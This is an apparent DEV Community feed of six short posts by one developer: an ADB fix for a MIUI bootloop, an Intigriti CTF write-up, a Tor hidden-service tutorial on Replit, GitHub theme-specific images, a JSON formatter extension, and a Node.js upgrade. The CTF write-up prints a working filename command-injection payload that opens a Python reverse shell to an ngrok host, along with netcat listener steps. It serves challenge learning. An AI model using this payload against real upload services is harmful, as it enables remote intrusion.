DEV Community: Arnav Kumar

Fix MIUI Device Bootlooping due to recent MIUI System UI Plugin Update (Without Data Wipe)

Arnav Kumar — Sun, 17 Mar 2024 12:54:50 +0000

Might be off-topic for devs, but thought it would be useful if you happen to own a MIUI device and the recent MIUI System UI Plugin update also got your phone into boot loop

News Here if you are wondering

Many would suggest that the only fix is to format your phone, and that would also wipe all of your data.

But obviously not the only way to fix it *(certain conditions applied)

If you had USB Debugging turned on before boot loop

As you can't control stuff on your phone while it's on boot loop (you can access the recovery settings though). What you can do is use ADB (android debug bridge) to control your phone via your pc, or your other phone via termux-adb (not covered in this article)

If you had left USB Debugging in developer options turned on (like me), you're in luck. ADB auto connects when you plug your phone to host device, and ADB still works when your phone is boot looping.

When your phone is in turned on state for a while,
open a terminal in your pc, run

adb devices

and confirm your device is there

if it's there, you're good to go

now the root cause was the System UI Plugin update, so you just need to uninstall its updates, and it'd fix your boot looping

you can uninstall it using ADB by running following

adb uninstall miui.systemui.plugin

miui.systemui.plugin is the package name of the app

Congrats! Its fixed now.

USB Debugging wasn't turned on before boot loop

For users who hadn't enabled USB Debugging before, I literally haven't explored much, my issue was fixed using ADB so I wanted to mention it as possible solution that would save your data for getting deleted.

I haven't explored tools like MI Flash Tool or MI Assistant, if they allow running ADB commands, you could do the same as above there, as mentioned before you can access the recovery menu even when in a boot loop so you can use those tools.

If you know whether they support such thing, you can mention in comments, I will mention it in the post

Again, thanks for reading!
hope it presented a possible solution for your problem

See you in the next post 😉

Going Blind to Find the Way (INTIGRITI Challenge 0723)

Arnav Kumar — Tue, 25 Jul 2023 11:17:05 +0000

Welcome,

So, this month we have some flag capturing in the Intigriti July Challenge 0723.

Lets begin!

Introduction

First things first, the challenge description states the following:

Should retrieve the flag from the web server.
The flag format is INTIGRITI{.*}.
Should NOT use another challenge on the intigriti.io domain.

Looking at the homepage, it's an online service that lets you extract audio from your video.

The main challenge page is the Upload Page having just a single file input that accepts only .mp4 files, having a submit button to submit the file.

Upon Extraction, it downloads the audio file extracted_audio.wav

Analyzing The Challenge

The frontend code just has code related to the layouts and styling, so nothing to look there.

That leaves with the only thing to attack, i.e. the file upload.

<form action="/upload" method="POST" enctype="multipart/form-data">
   <div class="form-group">
      <label for="video">Select a video file:</label>
      <div class="custom-file">
         <input type="file" class="custom-file-input" id="video" name="video" accept="video/mp4">
         <label class="custom-file-label" for="video">Choose file</label>
      </div>
   </div>
   <div class="text-center">
      <button type="submit" class="btn btn-primary">Upload and Extract Audio</button>
   </div>
</form>

The form is a simple one, and the input only seems to accept video/mpeg i.e. MP4 files in this case.

Upon experimenting a bit, we also find that we are not allowed to use spaces in the file name. Looks SUS! Yeah, it's more like a hint.

Now, the end goal is to find the flag by exploiting the file handling.

Solving the Challenge

Before anything else, I went straight up to testing whether I was somehow able to bypass the content type restriction, I tried modifying the filenames to do so, but none of them worked.

Doing so, I figured out the file should necessarily end with .mp4 extension for it to treat the file as a valid file.

Later, while testing I got this error message

It's a FFmpeg error!
So, They use FFmpeg to convert the video to audio.

Connecting it with our past finding, NO spaces allowed in filenames

Connecting the dots, it seemed to be a case of command injection.

So I started modifying the filename to possibly inject the command.

But if spaces are not allowed, how we would inject commands, as it will at least have a space. I asked myself

I literally searched alternate for space in bash
and came up with a Unix Stack Exchange Article that suggested to use ${IFS} in place of space and it works.

If it seems familiar to you, you might have seen it in the John Hammond's Video titled Filter Evasion in a REVERSE SHELL (no spaces!!) I just realized the same after getting it from article 😅

We have dealt with the space problem now it is time for the actual injection.

And that's where I fell into a rabbit hole 🕳️🐇 initially.

I assumed the command at backend would be something like ffmpeg -i "input_file.mp4" extracted_audio.wav

And thought to go with the SQL injection like approach.

And I came up with the following file name:

c" -loglevel panic;cat flag.txt > extracted_audio.wav;echo ".mp4

It worked locally with my assumption, but not in the real website.

I couldn't make it work. And one of the drawbacks were, I didn't know where the flag.txt was, it could have been current folder or in root. (It was in root btw)

By that time the post reached 100 likes, and we get a hint

Maybe you get errors.. Maybe everything looks normal.. Maybe you just gotta do it blind🙈

And yeah, there I realized blind🙈, the essence of this challenge!

I searched it and found its Blind SSRF.

As Port Swigger Explains:

Blind SSRF vulnerabilities arise when an application can be induced to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application's front-end response.

By the time I also realized it is not supposed to be like SQL Injection and is the Bash Command Substitution

So we got Spaces done, we have a way to inject command, just have to think of a payload to get access to the flag.

And I get into another rabbit hole 😅
I knew of netcat, and we can get contents of a file using netcat and do reverse shell with it.

I made nc payloads for reverse shells, but it didn't work, then one of my fellow friends suggested, nc might not be available in the environment as it might be sandboxed.

And yeah, finally we are leading to the solution.

So, I searched for reverse shell payloads on Google thinking if nc isn't there something else could be there.

and fortunately Came up with the pentestmonkey reverse shell cheatsheet that has many reverse shell payloads

I thought to try python one, as I'm more comfortable with it. And possibly the web app could also be in python.

I tried it, but still didn't work.

The problem: we can't use ${IFS} in python code string.

It was a easy fix as the only place where a space is there is the import statement.

And in python we have an alt for normal import statements: the __import__() function

import os and os=__import__("os") are literally the same thing.

But after that got error saving the long filename, for that just made variable names 1 letter.

I renamed the file, uploaded it and voilà a reverse shell 🎉

The flag.txt was in the root of the file system. And it contained the flag.

Solution

Setting it up

Start The Netcat Listener

nc -lvp 1111

l: listen
v: verbose
p: port

Use Ngrok to forward the connection, to get a usable URL that is accessible from the internet.

ngrok tcp 1111

We listen on TCP as that is the type of connection netcat uses to communicate

Note down the forwarding URL's domain and port, we'd make reverse shell connection by embedding them into the payload

here the domain is 0.tcp.in.ngrok.io alternatively can ping the domain to get the IP instead as it'd be shorter, in this case its 3.6.122.107
and the PORT is 14296

The payload

$(python${IFS}-c${IFS}'k=__import__("socket");l=__import__("subprocess");o=__import__("os");s=k.socket(k.AF_INET,k.SOCK_STREAM);s.connect(("<NGROK_DOMAIN>",<NGROK_PORT>));o.dup2(s.fileno(),0);o.dup2(s.fileno(),1);o.dup2(s.fileno(),2);p=l.call(["sh","-i"]);').mp4

Replacing the <NGROK_DOMAIN> with the domain and <NGROK_PORT> would complete the payload.

And once uploaded to the website it would open a reverse shell

We can see the flag.txt there

now just printing its content gives the flag

INTIGRITI{c0mm4nd_1nj3c710n_4nd_0p3n55l_5h3ll}

the previous flag had a typo INITGRITI was there instead of INTIGRITI and at the time of writing they fixed it. That's why screenshot flag is different.

I'd like to thank @_kavigihan for making the awesome challenge.

Happy Hacking!
Meet You in the Next post!

Deploy Your Node.js (or any) Apps to Dark Web! It's so Easy!

Arnav Kumar — Wed, 16 Mar 2022 12:46:43 +0000

Hey There Devs!

Hope you are doing well with your projects 😉.

Today I am gonna take you to the world of Dark Web!

Sounds Cool?

So, let's get into it!

Introduction

But before starting, lets clear some questions that might come up in your mind:

What dark web really is 🤔?
How it is different from the normal web that we use 🤔?
How will I access the Dark web 🤔?
Is it safe to use Dark Web 🤔?
Is it legal to use Dark Web 🤔?
Is it legal to host stuff on Dark Web 🤔?
Do I have to buy domains for Dark Web as we do in normal web 🤔?
Will it cost money to deploy 🤔?

If you already know these stuff and ready to go then you can directly skip to Procedure 🧪

Answers

The dark web is the World Wide Web content that exists on darknets: overlay networks that use the Internet but require specific software, configurations, or authorization to access. Through the dark web, private computer networks can communicate and conduct business anonymously without divulging identifying information, such as a user's location. The dark web forms a small part of the deep web, the part of the Web not indexed by web search engines, although sometimes the term deep web is mistakenly used to refer specifically to the dark web. [WikiPedia] (Probably Wikipedia was one of the best places for quick reliable intro 🙃)
Dark Web is part or division of the Deep web. Usually, the ordinary web is visible to search engines etc. But the deep web is the one that isn't visible to them. And in Dark Web All the data is encrypted and you need to use special software like tor to access the Dark Web. Dark Web Highly Focus on the user Anonymity.
To access Dark Web, as I already stated you need to use special Software, and one of the famous ones is tor that I am going to cover in this tutorial. Tor Browser is available for Windows, Linux, macOS and Android. You can download it from the official Download Page
Accessing the content on the Dark web is relatively safe. Same as using a regular browser. Just like in the regular web, don't open links or download files from unknown sources and you would be pretty safe!
Using Tor or visiting the Dark Web is not unlawful in itself. It is of course illegal to carry out illegal acts anonymously, such as accessing child abuse images, promoting terrorism, or selling illegal items such as weapons. So make sure you don't go into them and it will be totally legal.
As using Dark Web itself isn't illegal until you don't do bad stuff. You can host your website on the dark Web.
No, you don't have to buy a domain for Dark Web and most don't want an identifiable domain name either because it's made for Anonymity. You will get a randomly generated 56 digit domain with .onion at the end to host your website.
No, it doesn't cost any money to host a Dark Web site on tor. (obviously no charge for publishing a site but the hosting provider you choose may have their own pricing)

Procedure 🧪

Lets first summarize what we will be doing here:

Create Replit Account (if you don't have one)
Fork My Template for deploying Node.js project to Dark Web
Put Your Own Code in
And you would have a Dark Web site up and running 🚀

To deploy our Node.js App we will be using Replit. It is a simple yet powerful online IDE. You can do a bunch of stuff in it.

And I have Already Created a template in Replit that you will be using to host your Node.js App.

First things first if you don't have a Replit Account just go to https://replit.com and create one. Just log in with your GitHub and it will not take more than a few seconds.

Now that you have a Replit Account, you can fork the following repl: https://replit.com/@arnavkr/tor

On Opening the Fork you will find many files here's the directory structure:

./
├── domain.sh
├── index.js
├── .torrc
├── .replit
├── node_modules
├── package.json
├── package-lock.json
├── public
│   └── index.html
├── README.md
├── replit.nix
├── run.sh
└── tor
    └── hidden_service
        ├── authorized_clients
        ├── hostname
        ├── hs_ed25519_public_key
        └── hs_ed25519_secret_key

You will notice that there is already a Node.js Hello World Project setup. You just need to replace the Node.js Specific Files with your own code, Hit the Run Button and it will be deployed to the Tor. And you can access your website on Tor Browser.

But Before you close this article, you would be wondering "I have deployed it. But how to access it?".

To get the domain on which you can access your deployed site, you just have to run the domain.sh script

bash domain.sh

or if you don't want to do so, just head on to /tor/hidden_service/hostname file and you will see an onion domain. Just visit that domain in Tor Browser to View your site.

Understanding Files

`index.js`

This file doesn't need an introduction. You all know what it is for i.e. the entry point for the nodejs project

`node_modules/`

This is well known! and well blamed for eating storage too.

`package.json`

Config File for nodejs project

`package-lock.json`

This is automatically created when you install packages.

`public/`

This is being setup as the static hosting directory for express.js

`README.md`

Contains Some further explanations about the project

`run.sh`

This is the bash script that runs on clicking the Run Button on top. this script setups all things so you don't have to do much. Still if needed you can modify it accordingly.

`domain.sh`

The bash script to print the .onion domain on which the site can be accessed.

`.torrc`

The configuration file for Tor you can modify it accordingly if you want

`tor`

This directory contains all the files related to the tor

`.replit`

Configuration file for replit usually used to configure the behaviour of the run button

`replit.nix`

This is the nix config file in replit. Used to manage packages. More Info Here

Live Example

I have hosted the same template on replit.
And here's the link to the working example: http://nbrmr5m4gekl2lkof4kkarjfwpuaa745yfgmrnpn7bfjsoclm7g2lxad.onion/

Note: You can't open this is normal browser, you have to use Tor Browser to open this

End Notes

By default repls in replit sleeps when there is not much traffic on site. to let it not sleep you can either buy a hacker plan to use "always on" or use UptimeRobot to keep pinging your repl to keep it online

Hope you got it working.
If you come up with any issue you can just comment.

Using Dark/Light Mode Specific Images in GitHub Markdown

Arnav Kumar — Mon, 14 Feb 2022 16:56:44 +0000

Hey There Devs! 👋

Hope you are doing great with your projects.

Why this post? 🤔

As a developer we develop projects, write code all day around and we might also publish it on GitHub to let others understand and use our project.

And Markdowns play a vital role in explaining the code, branding your projects, showcasing your stats and so on.

And you all know how much is the craze of the Dark Mode nowadays especially between the Devs. But most browsers have light mode as their default.

So, here comes the actual point of this post. By default GitHub adapts most of the parts of the Markdown according to the theme. But it doesn't do anything with your images by default.

Imagine an image that was made to look good on white background with black as its foreground color. it will not even be notable in the dark mode.

So, you may want to optimize your Images according to the current theme of the viewer's browser. And also maybe to look a bit cool and professional 😅.

Procedure 🧪

The procedure is very simple. No I am not joking its actually very simple.

Do Create 2 separate versions of your images one optimized for light mode and one for dark mode. For example take this image of Termux. I have created two variants of the same image, one for light and one for dark: Light Mode Variant Dark Mode Variant
Now, here comes the magical thing 🪄. To make an Image only visible in Dark Mode, add #gh-dark-mode-only at the end of the image url. And to make an Image Only Visible in Light Mode, add #gh-light-mode-only.

Example:



![Termux Logo](https://user-images.githubusercontent.com/72879799/153904003-d7dee710-6552-4d23-a803-7a9a0ba67d92.png#gh-dark-mode-only)
![Termux Logo](https://user-images.githubusercontent.com/72879799/153904095-9d78a019-8495-4035-8174-e3da8e4dd66b.png#gh-light-mode-only)

Now the Dark Mode variant of the Image will only be visible in the Dark mode and the Light Mode variant will only be visible in the Light Mode.

The Image URLs above are just for demonstration. Replace them with your own image URLs and you are Ready to Go!

And it works 🥳🎉!

Live Example ⚡:

You can see the working example at my GitHub.

Disclaimers ⚠️

Note that it will not adapt according to the Theme if the image is not hosted on the GitHub

JSON Formatter - Your Lifesaver

Arnav Kumar — Mon, 06 Dec 2021 17:15:48 +0000

Welcome Devs!

As of now you already have seen that in our day to day work we come up with many types of URLs and files specifically JSON files they are almost everywhere. For files its clear. You use a text editor with a beautiful syntax highlighting and with your desired settings. But what about when you view them in browser? In your development career you may already heard of json formatter browser extensions. They format and syntax highlight the json codes from most of the json responses. But most don't give satisfactory results.

Some of the points that i noted while i was in search of the perfect Json Formatter Extension

Some of them don't work on JSON response returned with a non json Content-Type header
Some of them Don't Have Dark Mode (And we are Dark Lovers)
Some only let us see the json tree but not the raw data
Some are just data stealers
Some Just don't remember your preferences on specific sites
Some of them aren't regularly maintained And so on...

Here comes my JSON Formatter 🥳

So after seeing all these things i decided to create my own Extension that would solve all those problems and be the devs' best friend. Its New So its Obvious that its underated now, your support would be appreciatable! 😃

Its Available on Chrome Web Store for Chrome and also available on other webstores like edge and firefox

Short Link: bit.ly/json_formatter

Website: json-formatter.js.org

Features of my JSON Formatter Extension

Dark Mode (Automated + Manual)
Syntax Highlighting (VS Code Styled)
Works Offline 📴
Works with any JSON Webpage (webpage should just contain valid json code)
Automatically Linkify Links (just click on links in strings to open them)
Formats JSON automatically (No Setup Needed
Raw and Parsed Mode (Parsed for ease of your eye and raw for ease of your hands)
Remembers Theme Preferences ( knows which mode you prefer on which sites)
Shortcut Keys (1 tap controls, easy navigation)
Collapsible Toolbar (Easily Collapse the Toolbar)

I am looking for Suggestions and Feedbacks from you
If you have any issues related the extension you can open an issue at the Github Repo i will try to fix it asap!

Leave a Star⭐ on the repo and don't forget to rate the extension

Github Repo | issues | Fork JSON Formatter | My GitHub Profile

Screenshots:

Updating Node.js to 16+ in Replit

Arnav Kumar — Sat, 21 Aug 2021 15:42:55 +0000

Hey There,
Welcome to my first post, today i'll tell you how can you update your Replit's Nodejs version to 16+, so lets get started.

Many want to do that as to support Discord's latest v13 as it would only run on Nodejs v16.6 or higher. But there maybe your own reasons (Nobody likes old versions 😅).

Here's our repl at version 12.x.x after this tutorial it will be updated to 16+

At first go to your repl or if you don't have any just create one.

Go to the shell prompt and run the following code

npm init -y && npm i --save-dev node@16 && npm config set prefix=$(pwd)/node_modules/node && export PATH=$(pwd)/node_modules/node/bin:$PATH

After running the code you would see the following output:

And congo 🎉 your repl's nodejs has been successfully updated to 16+.
You could further confirm it by running node -v in the shell

Update: There's another better way to do this now just use the Node 16 template while creating the repl
https://replit.com/@RoBlockHead/NodeJS-16

DEV Community: Arnav Kumar

Fix MIUI Device Bootlooping due to recent MIUI System UI Plugin Update (Without Data Wipe)

If you had USB Debugging turned on before boot loop

USB Debugging wasn't turned on before boot loop

Going Blind to Find the Way (INTIGRITI Challenge 0723)

Introduction

Analyzing The Challenge

Solving the Challenge

Solution

Setting it up

The payload

Deploy Your Node.js (or any) Apps to Dark Web! It's so Easy!

Hey There Devs!

TOC

Introduction

Answers

Procedure 🧪

Understanding Files

index.js

node_modules/

package.json

package-lock.json

public/

README.md

run.sh

domain.sh

.torrc

tor

.replit

replit.nix

Live Example

End Notes

Using Dark/Light Mode Specific Images in GitHub Markdown

Hey There Devs! 👋

TOC

Why this post? 🤔

Procedure 🧪

Example:

Live Example ⚡:

Disclaimers ⚠️

JSON Formatter - Your Lifesaver

Welcome Devs!

Some of the points that i noted while i was in search of the perfect Json Formatter Extension

Here comes my JSON Formatter 🥳

Short Link: bit.ly/json_formatter

Website: json-formatter.js.org

Features of my JSON Formatter Extension

Screenshots:

Updating Node.js to 16+ in Replit

`index.js`

`node_modules/`

`package.json`

`package-lock.json`

`public/`

`README.md`

`run.sh`

`domain.sh`

`.torrc`

`tor`

`.replit`

`replit.nix`